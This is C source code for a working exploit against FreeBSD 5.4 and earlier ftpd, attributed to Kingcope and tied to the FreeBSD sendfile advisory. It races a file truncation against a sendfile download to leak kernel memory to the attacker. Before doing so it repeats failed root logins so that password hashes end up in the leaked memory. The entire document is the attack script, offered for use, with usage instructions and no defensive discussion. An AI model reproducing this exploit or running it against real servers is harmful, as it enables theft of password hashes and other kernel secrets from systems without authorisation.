/*FreeBSD <= 5.4-RELEASE ftpd (Version 6.00LS) sendfile kernel mem-leak by Kin

1. /*FreeBSD <= 5.4-RELEASE ftpd (Version 6.00LS) sendfile kernel mem-leak
2. by Kingcope
3. February 2011
4. --
5. kernel memory file may contain secret hashes and more..
6. tested on FreeBSD 5.3-RELEASE
7.  
8. reference: FreeBSD-SA-05:02.sendfile
9. */
10.  
11. #include <stdio.h>
12. #include <stdlib.h>
13. #include <string.h>
14. #include <unistd.h>
15. #include <sys/types.h>
16. #include <netinet/in.h>
17. #include <sys/socket.h>
18. #include <netdb.h>
19. #include <fcntl.h>
20. #include <unistd.h>
21.  
22. int createconnection(char *target, char *targetport);
23. void getline(int s);
24. void putline(int s, char *out);
25. void usage(char *exe);
26.  
27. char in[8096];
28. char out[8096];
29. char out2[8096];
30.  
31. int main(int argc, char *argv[]) {
32. extern int optind;
33. extern char *optarg;
34. int s,s2,s3,s4,nsock,nsock2;
35. int c,k,len;
36. int fd,lockfd;
37. int total_kmem_size=0;
38.  
39. char *target = NULL;
40. char *username = NULL;
41. char *password = NULL;
42. char *writeto = ".";
43. char *targetport = "21";
44. char *myip = NULL;
45. char *myip2 = NULL;
46. char *myip3 = NULL;
47. int octet_in[4], port;
48. struct sockaddr_in yo, yo2, cli, cli2;
49. char *oct = NULL;
50.  
51. while ((c = getopt(argc, argv, "h:i:p:l:k:d:s:")) != EOF) {
52. switch(c) {
53. case 'h':
54. target = (char*)malloc(strlen(optarg)+1);
55. strcpy(target, optarg);
56. break;
57. case 'i':
58. myip = (char*)malloc(strlen(optarg)+1);
59. strcpy(myip, optarg);
60. myip2 = (char*)malloc(strlen(optarg)+1);
61. strcpy(myip2, optarg);
62. myip3 = (char*)malloc(strlen(optarg)+1);
63. strcpy(myip3, optarg);
64. break;
65. case 'p':
66. targetport = (char*)malloc(strlen(optarg)+1);
67. strcpy(targetport, optarg);
68. break;
69. case 'l':
70. username = (char*)malloc(strlen(optarg)+1);
71. strcpy(username, optarg);
72. break;
73. case 'k':
74. password = (char*)malloc(strlen(optarg)+1);
75. strcpy(password, optarg);
76. break;
77. case 'd':
78. writeto = (char*)malloc(strlen(optarg)+1);
79. strcpy(writeto, optarg);
80. break;
81. case 's':
82. total_kmem_size = atoi(optarg);
83. break;
84.  
85. default:
86. usage(argv[0]);
87. }
88. }
89.  
90. if (target == NULL || myip == NULL)
91. usage(argv[0]);
92.  
93. if (total_kmem_size < 10) {
94. printf("size must be greater or equal 10.\n");
95. usage(argv[0]);
96. }
97.  
98. if (username == NULL || password == NULL) {
99. usage(argv[0]);
100. }
101.  
102. s = createconnection(target, targetport);
103. getline(s);
104.  
105. fprintf(stderr, "populating root hash in memory...\n");
106.  
107. for (k=0;k<3;k++) {
108. snprintf(out, sizeof out, "USER root\r\n");
109. putline(s, out);
110. getline(s);
111. snprintf(out, sizeof out, "PASS abcdef\r\n");
112. putline(s,out);
113. getline(s);
114. }
115.  
116. fprintf(stderr, "logging in...\n");
117.  
118. snprintf(out, sizeof out, "USER %s\r\n", username);
119. putline(s, out);
120. getline(s);
121. snprintf(out, sizeof out, "PASS %s\r\n", password);
122. putline(s,out);
123. getline(s);
124.  
125. fprintf(stderr, "changing to writeable directory...\n");
126.  
127. snprintf(out, sizeof out, "CWD %s\r\n", writeto);
128. putline(s, out);
129. getline(s);
130.  
131. fprintf(stderr, "putting file. this may take some time (%dMB)...\n", total_kmem_size);
132.  
133. snprintf(out, sizeof out, "TYPE I\r\n");
134. putline(s, out);
135. getline(s);
136.  
137. port = getpid() + 2048;
138. len = sizeof(cli);
139.  
140. bzero(&yo, sizeof(yo));
141. yo.sin_family = AF_INET;
142. yo.sin_port=htons(port);
143. yo.sin_addr.s_addr = htonl(INADDR_ANY);
144.  
145. oct=(char *)strtok(myip,".");
146. octet_in[0]=atoi(oct);
147. oct=(char *)strtok(NULL,".");
148. octet_in[1]=atoi(oct);
149. oct=(char *)strtok(NULL,".");
150. octet_in[2]=atoi(oct);
151. oct=(char *)strtok(NULL,".");
152. octet_in[3]=atoi(oct);
153.  
154. snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
155. putline(s, out);
156. getline(s);
157.  
158. if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
159. perror("socket");
160. return -1;
161. }
162.  
163. if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
164. perror("bind");
165. close(s2);
166. exit(1);
167. }
168.  
169. if (listen(s2, 10) < 0) {
170. perror("listen");
171. close(s2);
172. exit(1);
173. }
174.  
175. snprintf(out, sizeof out, "STOR kernelmemory\r\n");
176. putline(s, out);
177. getline(s);
178.  
179. sleep(1);
180.  
181. if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
182. perror("accept");
183. close(s);
184. exit(1);
185. }
186.  
187.  
188. k=0;
189.  
190. char *out3=NULL;
191. out3 = (char*)malloc(1024*1024*10);
192. if (out3 == NULL) {
193. perror("malloc");
194. exit(0);
195. }
196.  
197. memset(out3, 'C', 10*1024*1024);
198.  
199. do {
200. k += write(nsock, out3, 10*1024*1024);
201. if (k % 1000 == 0)
202. fprintf(stderr, "\r\r\r%d|%d ", k, total_kmem_size * 1024 * 1024);
203. } while (k < total_kmem_size * 1024 * 1024);
204.  
205. free(out3);
206.  
207. close(nsock);
208. close(fd);
209. getline(s);
210.  
211. fprintf(stderr, "getting file...\n");
212. fprintf(stderr, "forking truncate process into background.\n");
213.  
214. unlink("exploit.lck");
215.  
216. if (fork() == 0) {
217. fprintf(stderr, "=====START TRUNCATE FILE PROCESS ======\n");
218. s3 = createconnection(target, targetport);
219. getline(s3);
220.  
221. snprintf(out, sizeof out, "USER %s\r\n", username);
222. putline(s3, out);
223. getline(s3);
224. snprintf(out, sizeof out, "PASS %s\r\n", password);
225. putline(s3,out);
226. getline(s3);
227.  
228. while(1) {
229. if (open("exploit.lck", O_RDONLY) > 0) {
230. break;
231. }
232. }
233.  
234. snprintf(out, sizeof out, "TYPE I\r\n");
235. putline(s3, out);
236. getline(s3);
237.  
238. port = getpid() + 4000;
239. len = sizeof(cli2);
240.  
241. bzero(&yo2, sizeof(yo2));
242. yo2.sin_family = AF_INET;
243. yo2.sin_port=htons(port);
244. yo2.sin_addr.s_addr = htonl(INADDR_ANY);
245.  
246. oct=(char *)strtok(myip3,".");
247. octet_in[0]=atoi(oct);
248. oct=(char *)strtok(NULL,".");
249. octet_in[1]=atoi(oct);
250. oct=(char *)strtok(NULL,".");
251. octet_in[2]=atoi(oct);
252. oct=(char *)strtok(NULL,".");
253. octet_in[3]=atoi(oct);
254.  
255. snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
256. putline(s3, out);
257. getline(s3);
258.  
259. if ((s4=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
260. perror("socket");
261. return -1;
262. }
263.  
264. if ((bind(s4, (struct sockaddr *) &yo2, sizeof(yo2))) < 0) {
265. perror("bind");
266. close(s3);
267. exit(1);
268. }
269.  
270. if (listen(s4, 10) < 0) {
271. perror("listen");
272. close(s2);
273. exit(1);
274. }
275.  
276. snprintf(out, sizeof out, "STOR kernelmemory\r\n");
277. putline(s3, out);
278. getline(s3);
279.  
280. sleep(1);
281.  
282. if ((nsock2 = accept(s4, (struct sockaddr *)&cli2, &len)) < 0) {
283. perror("accept");
284. close(s);
285. exit(1);
286. }
287.  
288. close(nsock2);
289. close(fd);
290.  
291. close(s4);
292. fprintf(stderr, "=====END TRUNCATE FILE PROCESS ======\n\n");
293. fprintf(stderr, "Wait for the download to complete...\n");
294.  
295. while(1);
296. }
297.  
298. snprintf(out, sizeof out, "REST 0\r\n");
299. putline(s, out);
300. getline(s);
301.  
302. snprintf(out, sizeof out, "TYPE I\r\n");
303. putline(s, out);
304. getline(s);
305.  
306. port = getpid() + 1024;
307. len = sizeof(cli);
308.  
309. bzero(&yo, sizeof(yo));
310. yo.sin_family = AF_INET;
311. yo.sin_port=htons(port);
312. yo.sin_addr.s_addr = htonl(INADDR_ANY);
313.  
314. oct=(char *)strtok(myip2,".");
315. octet_in[0]=atoi(oct);
316. oct=(char *)strtok(NULL,".");
317. octet_in[1]=atoi(oct);
318. oct=(char *)strtok(NULL,".");
319. octet_in[2]=atoi(oct);
320. oct=(char *)strtok(NULL,".");
321. octet_in[3]=atoi(oct);
322.  
323. snprintf(out, sizeof out, "PORT %d,%d,%d,%d,%d,%d\r\n", octet_in[0], octet_in[1], octet_in[2], octet_in[3], port / 256, port % 256);
324. putline(s, out);
325. getline(s);
326.  
327. if ((s2=socket(AF_INET, SOCK_STREAM, 0)) < 0) {
328. perror("socket");
329. return -1;
330. }
331.  
332. if ((bind(s2, (struct sockaddr *) &yo, sizeof(yo))) < 0) {
333. perror("bind");
334. close(s2);
335. exit(1);
336. }
337.  
338. if (listen(s2, 10) < 0) {
339. perror("listen");
340. close(s2);
341. exit(1);
342. }
343.  
344. snprintf(out, sizeof out, "CWD %s\r\n", writeto);
345. putline(s, out);
346. getline(s);
347.  
348. snprintf(out, sizeof out, "RETR kernelmemory\r\n");
349. putline(s, out);
350. getline(s);
351.  
352. sprintf(out, "kernelmemory.%d", getpid());
353. fprintf(stderr, "saving kernel memory to >>> %s <<<\n", out);
354.  
355. fd = open(out, O_WRONLY | O_CREAT, 0777);
356. if (fd == -1) {
357. perror("open on local 'kernelmemory' file");
358. close(s);
359. exit(1);
360. }
361.  
362. sleep(1);
363.  
364. if ((nsock = accept(s2, (struct sockaddr *)&cli, &len)) < 0) {
365. perror("accept");
366. close(s);
367. exit(1);
368. }
369.  
370. int k2=0;
371. char *in2 = (char*)malloc(1024*1024*10);
372. if (in2 == NULL) {
373. perror("malloc");
374. exit(0);
375. }
376. do {
377. k = recv(nsock, in2, 1024*1024*10, 0);
378. if (k < 1) break;
379. k2+=k;
380. // if (k2 % 1000 == 0)
381. fprintf(stderr, "\r\r\rREAD=%d BYTES ", k2);
382.  
383. if (k2 > 1024) {
384. lockfd = open("exploit.lck", O_CREAT|O_RDWR, 0777);
385. sleep(1);
386. close(lockfd);
387. }
388. write(fd, in2, k);
389. } while (k > 0);
390.  
391. free(in2);
392.  
393. getline(s);
394.  
395. close(nsock);
396. close(fd);
397. close(s);
398.  
399. }
400.  
401. int createconnection(char *target, char *targetport) {
402. struct addrinfo hints, *res;
403. int s;
404.  
405. memset(&hints, 0, sizeof hints);
406. hints.ai_family = AF_UNSPEC;
407. hints.ai_socktype = SOCK_STREAM;
408.  
409. if (getaddrinfo(target, targetport, &hints, &res)) {
410. perror("getaddrinfo");
411. exit(1);
412. }
413.  
414. s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
415. if (s < 0) {
416. perror("socket");
417. exit(1);
418. }
419.  
420. if (connect(s, res->ai_addr, res->ai_addrlen) < 0) {
421. perror("connect");
422. exit(1);
423. }
424.  
425. return s;
426. }
427.  
428. void getline(int s)
429. {
430. memset(in, '\0', sizeof in);
431. if (recv(s, in, sizeof in, 0) < 1) {
432. perror("recv");
433. close(s);
434. exit(1);
435. }
436.  
437. fprintf(stderr, "<\t%s", in);
438. }
439.  
440. void putline(int s, char *out) {
441. fprintf(stderr, ">\t%s", out);
442.  
443. if (send(s, out, strlen(out), 0) == -1) {
444. perror("send");
445. close(s);
446. exit(1);
447. }
448. }
449.  
450. void usage(char *exe)
451. {
452. fprintf(stderr, "%s <-h host> <-i your internal ip> <-s size in MB to read from kernel> [-p port] <-l username> <-k password>"
453. " [-d writable directory] \n",
454. exe);
455. exit(0);
456. }